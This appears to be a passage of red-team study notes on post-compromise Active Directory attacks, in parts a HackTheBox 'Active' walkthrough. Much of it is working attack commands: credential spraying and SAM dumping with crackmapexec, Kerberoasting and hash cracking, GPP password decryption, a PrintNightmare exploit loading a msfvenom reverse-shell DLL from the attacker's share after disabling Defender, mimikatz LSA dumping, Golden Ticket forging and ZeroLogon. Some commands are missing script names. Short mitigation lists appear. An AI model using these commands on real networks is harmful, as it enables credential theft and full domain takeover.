≽^._.^≼ ∫

Compromising AD - Part 3: Post Compromise Attacks

Post-Compromise Attacks


If we crack a password and/or dump the SAM Hashes, we can leverage both for lateral movement in networks!

??? WTF

we gotta use a tool called crackmapexec

apt install crackmapexec


crackmapexec smb {ip} -u {username} -d {domain} -p {password} --sam

crackmapexec smb -u Thanos -d MARVEL -p 1nf1n1ty_Gauntl3t --sam


crackmapexec smb -u Spiderman -H hash69f420x31337u --local-auth --sam

	--local-auth passes locally
	--sam dumps the SAM file

So, crackmapexec throws the password all around the subnet

AND the ISSUE is a lot of ADMINS will use the SAME PASSWORDS for machines (Especially LOCAL MACHINES)

Now, use smbexec, wmiexec, psexec or Metasploit to break in! domain/user:password@ip 

secretsdump: dump SAM hashes :) domain/user:password@ip 

psxec with hashes user@ip --hashes LMHASH:NTHASH



What are tokens?

Temporary keys that allow you access to a system/network without having to provide credentials each time you access a file. Think cookies for computers.

Two types





Goal: Get the Ticket Granting Service (TGS) and decrypt server’s account hash!

We have a Domain Controller - Which is Key Distribution Center (KDC). We have a Application Server (MySQL, Antivirus, etc)

1. Victim User Requests a Ticket Granting Ticket (TGT), I am gonna provide my NTLM hash.

2. Domain Controller Sends the Ticket Back, encrypted with Kerberoast Ticket Granting Ticket (krbtgt) hash.

Wait! How did we get the Ticket? - Because of NTLM hash (meaning we have a username and password).

Remember Application Server? It is running a service and we have something called Service Principal Name (SPN).

3. In order to access the service, we have to first request a Ticket Granting Service (TGS).

How do we request Ticket Granting Service (TGS)? - We provide Ticket Granting Ticket (TGT).

4. The Server Knowns Server Account Hash, so it's going to ENCRYPT TGS and send it to Victim.

Note that the KDC does not know we have access to the server!

In order to authenticate to that server, we present that TGS to Application Server, and the Server will decrypt it using their own Server Hash! (It will Validate - Yes/No)

Well we have a TGS and we can CRACK THE HASH!

We gonna use a tool called (Impacket)

python3 {domain}/{username}:{password} -dc-ip {ip} -request

It will Return the HASH

crack it with Hashcat!

hashcat --help | grep Kerberos

13100	-	Kerberos 5 TGS

hashcat -m 13100 hash.txt rockyou.txt -O

-O for optimize

We now have the Password for the SERVICE :)



Group Policy Preferences Attack aka MS14-025

GPP allowed admins to create policies using embedded credentials.

These credentials were encrypted and stored in “cPassword”.

The way SYSVOL works is that it is storing groups.xml file, and in that XML file, you find that cPassword!

The key to this encryption was accidentally released.

Patched in MS14-025, but doesn’t prevent previous uses.



Exploiting “Active” Machine on HacktheBox

Active Machine Link:

nmap scan

nmap -T5

Notice the open ports

53		domain
88		Kerberos-sec
389 	ldap
445* 	microsoft-ds
636		ldapssl

You may try msf module smb_enum_gpp

OR Just manually get the groups.xml file!

Look at 445, the attack involves using SMB (which contains SYSVOL Folder)

Lets Go!

smbclient -L \\\\\\

Lets Connect using Replication

smbclient -L \\\\\\Replication

We got Access to dat machine!

Now change some settings:

prompt off

recurse on

Grab them Files!

mget *

We see Groups.xml, we have


now :) Pro Gamer Move!

gpp-decrypt edBSHOwhZLTjt/QS9FeIcJ83mjWA98gw9guKOhJOdcqh+ZGMeXOsQbCpZ3xUjTLfCuNH8pG5aSVYdYw/NglVmQ


But note that \\Replication doesn’t always work, so try getting a Domain User Account!

Privesc that Machine! active.htb/SVC_TGS:[email protected]

We see that nothing is Writable :(

Let’s try Kerberoasting (Hint: SVC_TGS is Ticket Granting Service!) active.htb/SVC_TGS:GPPstillStandingStrong2k18 -dc-ip -request

Whoa! We got a Service Ticket! Crack that Hash!


:) active.htb/Administrator:[email protected]

Get da Flag!



After Compromising a user, suppose the user has SHARE ACCESS we can utilize that access to crack more hashes via a Responder (Potential Privesc)

SCF Attack -

SCF and URL file attack against writeable share

Drop the following @something.scf file inside a share and start listening with Responder : responder -wrf --lm -v -I eth0


This attack also works with .url files and responder -I eth0 -v. say @test.url



Takes advantage of the Printer Spooler, which has some functionality which allows the users to add Printers, which runs as a SYSTEM PRIVILEGE!.

Because of which any sort of Autheticated Attacker can run CODE EXECUTIONS as PRIVILEGED USER! XD


cube0x0 RCE -

calebstewart LPE -


Mitigation - just disable the damn service!

Stop-Service Spooler
REG ADD  "HKLM\SYSTEM\CurrentControlSet\Services\Spooler"  /v "Start" /t REG_DWORD /d "4" /f


Before running the exploit you need to install new version of Impacket

pip3 uninstall impacket
git clone
cd impacket
python3 ./ install

Get that CVE Script



{ip} => Our Attacker's IP
{dcip} => Domain Controller's IP

Now we’re going to run that script with a malicious .dll

AND we’re going to host that .dll

/ hackit.local/domain_user:[email protected] '\\\smb\addCube.dll'

./ hackit.local/domain_user:[email protected] 'C:\addCube.dll'

Generate a payload, using msfvenom

msfvenom -p windows/x64/meterpreter/reverse_tcp LHOST={ip} LPORT=4444 -f dll > shell.dll

Now get a meterpreter session


use multi/handler

set payload windows/x64/meterpreter/reverse_tcp


set LPORT=4444 and LHOST={ip}


Share the shell.dll file share `pwd` -smb2support

`pwd` shares the current entire directory

So now we need to have

python3 MARVEL.local/fcastle:Password1@{dcip} '\\{ip}\share\shell.dll' 

We get Windows Defender Error!

Let’s turn off defender and try again! Now, we successfully get the shell access :)

	Server username: NT AUTHORITY\SYSTEM


TF? Windows Defender?

You can Bypass AV, it’s all because of .dll

Check this Article:


What’s that?



Special Notes:


Mimikatz Wiki:

Fire up cmd


Here, privilege is a module and debug means that it is allowing us to debug a process

Expected Outcome:

Privilege '20' OK

Now we’re going to attempt to dump some information out of memory

Since we have Privilege Debug on, now let’s do some attacks!


Tip: We can pass the NTLM hash around

In the wdigest section we can see

Password : (null)

Well in Windows 7, by default wdigest feature was on which stored passwords in clear text!

But in later versions of Windows they patched it (nah they just turned it off, mega big brain)

We can turn on that feature using mimikatz!

We can also dump sam


We can **dump lsa **

Local Security Authority, is a protected sub-system in Windows Authentication, which Autheticates Logon Sessions to the Local Computer

lsadump::lsa /patch

NTDS.dit will also contain credentials



What is a Golden Ticket?

krbtgt Account - Kerebos Ticket Granting Ticket Account, allows us to generate tickets

If we have the hash for it, WE CAN GENERATE TICKETS!

With this, we request access to any Resource or System on the Domain! using the Ticket Granting Service




lsadump::lsa /inject /name:krbtgt

Whoa that’s a lot of Information! What do we actually need?

Now, moving further


kerberos::golden /User:Whatever /domain:{domain_name} /sid:{SID} /krbtgt:{NTLM_hash} /id:500 /ptt

/id:500 	500 is the ID of Admin Account
/ptt 		Pass the Ticket

We are going to generate a Golden Ticket here and then we are going to use Pass the Ticket and pass it along to the Next Session, so we are going to utilize that ticket to open up a Command Prompt which has access to any Computer on the Domain!

So in our case:

kerberos::golden /User:Administrator /domain:marvel.local /sid:S-1-5-21-301214212-3920777931-1277971883 /krbtgt:11f843aafd22acfb29aef92f6e423994 /id:500 /ptt

After getting it done successfully,


A Command Prompt opens up!


How to get a shell?

psexec.exe \\COMPUTERNAME cmd.exe


You can take one or more of these steps to protect against golden ticket attacks.

  1. Enforce a least privilege access model.

    • Limit user access to only what they need.
    • Limit the amount of admin accounts to only those who absolutely need it and ensure admin access is not simply added to their day-to-day user account.
  2. Implement multi-factor authentication (MFA) on all external authentication points, including VPN and OWA/O365.

  3. Don’t have RDP open to the internet. Seriously. Port numbers don’t matter. Get RDP behind a VPN, and implement MFA on it.

  4. Fake credentials can be injected into the LSAS cache, which would be tempting to hackers. Seeing these “honeycreds” used would clearly indicate an issue.

  5. Perform the reset of the krbtgt account (twice) in accordance with your password reset policies, or quarterly.

  6. If possible, consider running LSAS in its available protected mode.

  7. Enable Windows Defender Credential Guard on applicable systems (Windows 10 and Server 2016 and above). Do not use on domain controllers.


aka CVE-2020-1472

Attacking the Domain Controller, Setting the Password to null and taking over the Domain Controller.

Issue: When we run the Attack, **and if we do not restore it, we break it **



Check if Vulnerable

python3 COMPUTERNAME {dcip}

Now Let’s Attack

python3 COMPUTERNAME {dcip}

Changed the Account Password to an Empty String

How can we know that this is done??

Lets dump out the secrets of the Machine -just-dc {domain}/{dc}\$@{dcip}

$ => empty value -just-dc DOMAINNAME/COMPUTERNAME\$@{dcip}


Wait, How the hell do I restore this?

Copy the Administrator Hash administrator@{dcip} -hashes adm1nha$h

Look for plain_password_hex

Now use the Restore Script

python3 DOMAINNAME/COMPUTERNAME@COMPUTERNAME -target-ip {dcip} -hexpass {plain_password_hex}



  1. Patch. Apply the relevant Microsoft patch as quickly as possible!

  2. Proactively close patch gaps. Non-Windows machines are still somewhat unprotected from ZeroLogon. Search your network for non-Windows computer accounts with elevated privileges (e.g. domain replication privileges) as these could be used to launch a successful ZeroLogon attack even on patched domain controllers. (Falcon Zero Trust can provide you with a complete list of privileged accounts.)

  3. If you cannot patch for any reason:

Next » Part 4: Post Exploitation

#active-directory #cybersecurity #windows #red-teaming